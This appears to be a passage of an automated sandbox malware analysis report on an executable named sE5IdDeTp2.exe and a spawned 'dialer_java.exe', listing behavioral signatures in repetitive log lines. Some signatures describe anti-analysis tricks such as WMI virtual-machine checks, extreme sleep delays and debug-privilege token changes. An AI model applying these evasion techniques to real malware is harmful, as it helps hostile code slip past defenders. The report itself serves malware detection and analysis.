Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3167	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6672	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2410
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7828	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1890	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8183
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1465
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2956
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6830
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7719
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2034
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7608
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2096
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7253
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7355
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8053
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1618
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7926
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1681
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8194
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1376
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7037
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2674

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	API coverage: 0.4 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	API coverage: 6.3 %
Source: C:\Windows\System32\conhost.exe	API coverage: 0.7 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	API coverage: 6.3 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	API coverage: 6.4 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	API coverage: 6.3 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	API coverage: 6.4 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	API coverage: 6.3 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep count: 3167 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep count: 6672 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144	Thread sleep count: 7321 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep count: 2410 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1072	Thread sleep count: 7828 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1072	Thread sleep count: 1890 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036	Thread sleep count: 8183 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000	Thread sleep count: 1465 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2488	Thread sleep count: 2956 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2488	Thread sleep count: 6830 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5144	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7272	Thread sleep count: 7719 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5344	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7272	Thread sleep count: 2034 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764	Thread sleep count: 7608 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000	Thread sleep count: 2096 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1880	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5212	Thread sleep count: 7253 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5168	Thread sleep count: 2514 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516	Thread sleep count: 7355 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996	Thread sleep count: 2411 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5024	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312	Thread sleep count: 8053 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5416	Thread sleep count: 1618 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6260	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6152	Thread sleep count: 7926 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6456	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7092	Thread sleep count: 1681 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864	Thread sleep count: 8194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084	Thread sleep count: 1376 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800	Thread sleep count: 7037 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800	Thread sleep count: 2674 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5568	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400389D0 MultiByteToWideChar,MultiByteToWideChar,calloc,MultiByteToWideChar,FindFirstFileW,free,FindClose,		27_2_00000001400389D0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140038E50 strncpy,MultiByteToWideChar,MultiByteToWideChar,calloc,MultiByteToWideChar,FindFirstFileW,free,malloc,FindClose,		27_2_0000000140038E50

Source: C:\Windows\System32\conhost.exe

Code function: 27_2_0000000140009160 GetSystemInfo,

27_2_0000000140009160

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: conhost.exe, 0000001B.00000002.3547906679.000002B3553B0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: B;Nk7sHQPmx\cru\\|Rmf[;n.zi]h5_e;k\N/_JfKqeMUkRWpncO)zNGp&~X~.zX
Source: conhost.exe, 0000001B.00000002.3547471787.000002B353A61000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000003.1932871231.000002B353A61000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000003.1928785863.000002B353A61000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000003.1930710101.000002B353A61000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000002.3547471787.000002B3539F8000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000003.1931997463.000002B353A61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF7796F1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	0_2_00007FF7796F1160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DC1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	15_2_00007FF695DC1160
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	27_2_000000014000118B
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400011D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	27_2_00000001400011D8
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F711160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	34_2_00007FF79F711160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21D1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	48_2_00007FF7F21D1160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC21160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	63_2_00007FF7CFC21160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA01160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	77_2_00007FF79AA01160
